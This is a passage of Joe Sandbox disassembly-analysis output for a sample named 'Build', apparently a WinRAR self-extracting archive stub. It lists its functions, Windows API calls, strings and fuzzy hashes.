Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: f4297711b8b88e5142f35b6e3fcfb8510d2f039087c582183b22669110330018
Instruction ID: ba33f72bd51191cb5682d2ae07ac0de9e8ec64109eee17f8738aa5024e9fece2
Opcode Fuzzy Hash: f4297711b8b88e5142f35b6e3fcfb8510d2f039087c582183b22669110330018
Instruction Fuzzy Hash: 575147B1508345AFD700DF65C88096BFBE8FB88715F408A2EF596C3211E778E948CB56

Function 0043BC7E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0043BC8A

Strings

</style>, xrefs: 0043BDD2
<br>, xrefs: 0043BD7E
<style>, xrefs: 0043BDB0
</p>, xrefs: 0043BD68
>, xrefs: 0043BCCB

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: a6eec24bae4e33682de04091140702e79d9fffb952e2d4d4a60335de0f5f35b4
Instruction ID: 7bad0365ae8a641b7a9dfd797cfa7855466a0426e659ca02f2e59e99d805d599
Opcode Fuzzy Hash: a6eec24bae4e33682de04091140702e79d9fffb952e2d4d4a60335de0f5f35b4
Instruction Fuzzy Hash: 4E51F666B4431656DB305A1998127B763D1DFA8790F68242BEFC18B3C1FB7C8D8182ED

Function 0042ACE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 149fileCOMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0042AD2B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0042AD4A

Part of subcall function 0042E208: _wcslen.LIBCMT ref: 0042E210

Part of subcall function 00434168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0042E084,00000000,.exe,?,?,00000800,?,?,?,0043AD5D), ref: 0043417E

_swprintf.LIBCMT ref: 0042ADEC

Part of subcall function 00424C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00424C13

MoveFileW.KERNEL32(?,?), ref: 0042AE5E
MoveFileW.KERNEL32(?,?), ref: 0042AE9E

Strings

rtmp%d, xrefs: 0042ADD5

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: FileMoveNamePath$CompareLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 2133196417-3303766350
Opcode ID: 916bf3907a7d794017fd9d663d3cbd24f380d22d6f09b8efd6019f25b4147613
Instruction ID: 1c6e55ec34870a279230d12655c9ab7fcb9b93907912e96fd610a4321905ab95
Opcode Fuzzy Hash: 916bf3907a7d794017fd9d663d3cbd24f380d22d6f09b8efd6019f25b4147613
Instruction Fuzzy Hash: 54519271A00628A7CF20EB61DC45EEF737CAF04345F8108ABB955A3141EB3C9A958F69

Function 0043BE55 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 0043BE8A
GetWindowRect.USER32(?,?), ref: 0043BED1
ShowWindow.USER32(?,00000005,00000000), ref: 0043BF6C
SetWindowTextW.USER32(?,00000000), ref: 0043BF74
ShowWindow.USER32(00000000,00000005), ref: 0043BF8A

Strings

RarHtmlClassName, xrefs: 0043BF31

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: c0bab15d1586ed2e1d9f1ad28826a0e19a0eb7ef54d04113b7e2e065e2f0a3de
Instruction ID: 04d93ce98e3fdb76405ac49159e4c2e14ce383c7fbbdf895176b42a04ac970d5
Opcode Fuzzy Hash: c0bab15d1586ed2e1d9f1ad28826a0e19a0eb7ef54d04113b7e2e065e2f0a3de
Instruction Fuzzy Hash: 9E41B372108300AFCB109F64DC89B5B7BE8EF4C711F15596EFA49DA252DB38D800CBA9

Function 0043B8D5 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0043B8DE
_wcslen.LIBCMT ref: 0043B913

Strings

, xrefs: 0043B930
<br>, xrefs: 0043B95F
 , xrefs: 0043B9A1
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 0043B907

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 2d9b6efc3b38e31d9a121d62a01b711be5d53204e41162b885edd94cbe50602e
Instruction ID: 91af1a39049ccfe1ef88dd1fee27f25092ff224b582faea32b2ec02c16d27810
Opcode Fuzzy Hash: 2d9b6efc3b38e31d9a121d62a01b711be5d53204e41162b885edd94cbe50602e
Instruction Fuzzy Hash: 98313AA264430556EA30EA559C42B7BB3A4EF54324F60442FEB9597380FB5CAC4583ED

Function 0044EEF4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0044EEB8: _free.LIBCMT ref: 0044EEE1

_free.LIBCMT ref: 0044EF42

Part of subcall function 0044BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0044EEE6,?,00000000,?,00000000,?,0044EF0D,?,00000007,?,?,0044F30A,?), ref: 0044BB10
Part of subcall function 0044BAFA: GetLastError.KERNEL32(?,?,0044EEE6,?,00000000,?,00000000,?,0044EF0D,?,00000007,?,?,0044F30A,?,?), ref: 0044BB22

_free.LIBCMT ref: 0044EF4D
_free.LIBCMT ref: 0044EF58
_free.LIBCMT ref: 0044EFAC
_free.LIBCMT ref: 0044EFB7
_free.LIBCMT ref: 0044EFC2
_free.LIBCMT ref: 0044EFCD

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
Instruction ID: 87ab6a53e7ad98f0ce67b687c3d22b75b977cd7ae075b17afc122694a364ec45
Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
Instruction Fuzzy Hash: 2611CC72940B04AEF520F7B3CC46FCB77ACBF04705F504C1AF69A66292DB79B5064698

Function 00428C95 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000020,?), ref: 00428CB2
GetLastError.KERNEL32 ref: 00428CF6
CloseHandle.KERNEL32(?), ref: 00428D05

Strings

^D, xrefs: 00428CD7
JD, xrefs: 00428CEC
@D, xrefs: 00428CB9

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: CloseCurrentErrorHandleLastProcess
String ID: @D$JD$^D
API String ID: 1009092642-1017003275
Opcode ID: e842336ecec0366522c274c9fa0779dce014b3a37586f0eb7ee60e7f33e534ca
Instruction ID: 52b83d30c62a28b7dd60850bdf99ee6f28fc5f11d2b42d790bf5bb3de2493cf8
Opcode Fuzzy Hash: e842336ecec0366522c274c9fa0779dce014b3a37586f0eb7ee60e7f33e534ca
Instruction Fuzzy Hash: BF016170601219AFDB009FA0EC89BBF7BBCEB04345F804429A401E2190DA74CD488B74

Function 00440ACB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00440B46,00440AA9,00440D4A), ref: 00440AE2
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00440AF8
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00440B0D

Strings

AcquireSRWLockExclusive, xrefs: 00440AF2
ReleaseSRWLockExclusive, xrefs: 00440B02
KERNEL32.DLL, xrefs: 00440ADD

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 64433519d2f06587259891c7b8f2d8a1a3f5535c3b92e91f9458a1cb1e0692aa
Instruction ID: a7234d2b68cf56ea0199b7001d0d16f78d83ff537f8a5de50e60553d8a4bfc11
Opcode Fuzzy Hash: 64433519d2f06587259891c7b8f2d8a1a3f5535c3b92e91f9458a1cb1e0692aa
Instruction Fuzzy Hash: B1F0F4313A1361877B61AFE04C8562B62C8DA1174A330443FDF00E3342EE38D8A183DD

Function 0043418A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00434192
_wcslen.LIBCMT ref: 004341A3
_wcslen.LIBCMT ref: 004341B3
_wcslen.LIBCMT ref: 004341C1
CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0042D2D3,?,?,00000000,?,?,?), ref: 004341DC

Strings

<, xrefs: 004341DC

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _wcslen$CompareString
String ID: <
API String ID: 3397213944-4251816714
Opcode ID: bf11863f60a9cbfb9446ac368a2cffd30a58208d613d9016c35ab62a3b839e05
Instruction ID: 92a852575444a60379946696444d1922baab6b60cd0fbef535234643a1c8940e
Opcode Fuzzy Hash: bf11863f60a9cbfb9446ac368a2cffd30a58208d613d9016c35ab62a3b839e05
Instruction Fuzzy Hash: B1F09032108154BFDF121F55EC09CCE3F26EF96770B128016F6195A061CE32E99196D9

Function 0044B160 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044B17E

Part of subcall function 0044BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0044EEE6,?,00000000,?,00000000,?,0044EF0D,?,00000007,?,?,0044F30A,?), ref: 0044BB10
Part of subcall function 0044BAFA: GetLastError.KERNEL32(?,?,0044EEE6,?,00000000,?,00000000,?,0044EF0D,?,00000007,?,?,0044F30A,?,?), ref: 0044BB22

_free.LIBCMT ref: 0044B190
_free.LIBCMT ref: 0044B1A3
_free.LIBCMT ref: 0044B1B4
_free.LIBCMT ref: 0044B1C5

Strings

p,F, xrefs: 0044B174

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: p,F
API String ID: 776569668-222182985
Opcode ID: fee999484c2486c29489298b97ccd8501f02c1d41bbd3e3edf5181c12485e6b8
Instruction ID: 8fd175f4a63aa223e0f49b4f69384499177641e855ba4b3433f2dd3a775f3c7f
Opcode Fuzzy Hash: fee999484c2486c29489298b97ccd8501f02c1d41bbd3e3edf5181c12485e6b8
Instruction Fuzzy Hash: FAF0BD74810620ABD681BB56EC0148D3765F71472930249AFF41667261DBBB48428FDE

Function 00433583 Relevance: 9.1, APIs: 6, Instructions: 104timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 004335E6

Part of subcall function 0042D076: GetVersionExW.KERNEL32(?), ref: 0042D0A7

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0043360A
FileTimeToSystemTime.KERNEL32(?,?), ref: 00433624
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00433637
SystemTimeToFileTime.KERNEL32(?,?), ref: 00433647
SystemTimeToFileTime.KERNEL32(?,?), ref: 00433657

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 92c10b93f56c77ecf33ac6eabef7f40674e2d401bf668a658bb46315d0137466
Instruction ID: d774b5d9617395cd3d24a5c3b1609748b77b7d1692a7c477334e08bdf59eb069
Opcode Fuzzy Hash: 92c10b93f56c77ecf33ac6eabef7f40674e2d401bf668a658bb46315d0137466
Instruction Fuzzy Hash: 2D4149761083159FCB04DFA8C8849ABB7E8BF98715F44492EF995C7211E730D905CBAA

Function 0044511A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00445111,00444ECC,004421B4), ref: 00445128
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00445136
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0044514F
SetLastError.KERNEL32(00000000,00445111,00444ECC,004421B4), ref: 004451A1

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 279d0af300bd00b99bad0e1ed5bdc65a7ac3b589c3c0a60bfb7133976144e0b5
Instruction ID: 3b25e5df4568741b2faf0227b0eabd0ab95c658e3c804346ea945f97db368035
Opcode Fuzzy Hash: 279d0af300bd00b99bad0e1ed5bdc65a7ac3b589c3c0a60bfb7133976144e0b5
Instruction Fuzzy Hash: F3012832908B116FBA142BB5BC85B272B44EB02739BA1033FF410851E2FFD94C10914E

Function 0044B9A5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,004650C4,00446E12,004650C4,?,?,0044688D,?,?,004650C4), ref: 0044B9A9
_free.LIBCMT ref: 0044B9DC
_free.LIBCMT ref: 0044BA04
SetLastError.KERNEL32(00000000,?,004650C4), ref: 0044BA11
SetLastError.KERNEL32(00000000,?,004650C4), ref: 0044BA1D
_abort.LIBCMT ref: 0044BA23

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 97c635b5aed9380b0bfe0841effc6b178b20dbb2c035bcb0ab87b67ecaf6cf6f
Instruction ID: 47b656873ba4e298b7ffb1604181112ff808391aac76bc40c8894f6ab970e801
Opcode Fuzzy Hash: 97c635b5aed9380b0bfe0841effc6b178b20dbb2c035bcb0ab87b67ecaf6cf6f
Instruction Fuzzy Hash: AEF0D136100A0177F256B33A6D0AA6B2529DBC1B3AF21052BF605A2392EF6DCC02519D

Function 0044004D Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00440059
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00440073
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00440084
TranslateMessage.USER32(?), ref: 0044008E
DispatchMessageW.USER32(?), ref: 00440098
WaitForSingleObject.KERNEL32(?,0000000A), ref: 004400A3

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 72e9bd782d65d811d32690dd45958227756967e0de0de9cd8d57d82a4be8262b
Instruction ID: 5252a1a0868e6c95a42d7690033d2d46740b44e6b1a6ffaa602f1721f233b018
Opcode Fuzzy Hash: 72e9bd782d65d811d32690dd45958227756967e0de0de9cd8d57d82a4be8262b
Instruction Fuzzy Hash: F6F04F72E01229BBCB205BA1EC4CECF7F6DEF42751B108422F60AD2050D638C545CBA4

Function 0043D41C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000001), ref: 0043D57B
GetDlgItemTextW.USER32(?,00000066,00001000,00000200), ref: 0043D591
SetDlgItemTextW.USER32(?,00000067,?), ref: 0043D5B9

Strings

GETPASSWORD1, xrefs: 0043D548
Software\WinRAR SFX, xrefs: 0043D466

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000486000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039872390.0000000000487000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_420000_Build.jbxd

Similarity

API ID: ItemText$Dialog
String ID: GETPASSWORD1$Software\WinRAR SFX
API String ID: 1770891597-1315819833
Opcode ID: ef609b7ca9fc39fe4b90da700c1aeeda038225e02318a0fc56ca3f470e005b02
Instruction ID: 6bd4dc8097ce2ed4c93f3786e6f74121cbbc954e4f654d8837e9bab239db22a3
Opcode Fuzzy Hash: ef609b7ca9fc39fe4b90da700c1aeeda038225e02318a0fc56ca3f470e005b02
Instruction Fuzzy Hash: A141B271904208ABEB30AB649C45FFE77ACEB59304F20483EF605E7191DB78A9448B69

Function 0042E033 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00432663: _wcslen.LIBCMT ref: 00432669

Part of subcall function 0042D848: _wcsrchr.LIBVCRUNTIME ref: 0042D85F

_wcslen.LIBCMT ref: 0042E105
_wcslen.LIBCMT ref: 0042E14D

Strings

.exe, xrefs: 0042E079
.sfx, xrefs: 0042E088
.rar, xrefs: 0042E04F, 0042E0A2

Memory Dump Source

Source File: 00000005.00000002.2039610072.0000000000421000.00000020.00000001.01000000.00000006.sdmp, Offset: 00420000, based on PE: true

Associated: 00000005.00000002.2039585784.0000000000420000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000462000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000469000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2039675776.0000000000482000.00000004.00000001.01000000.00000006.sdmpDownload File
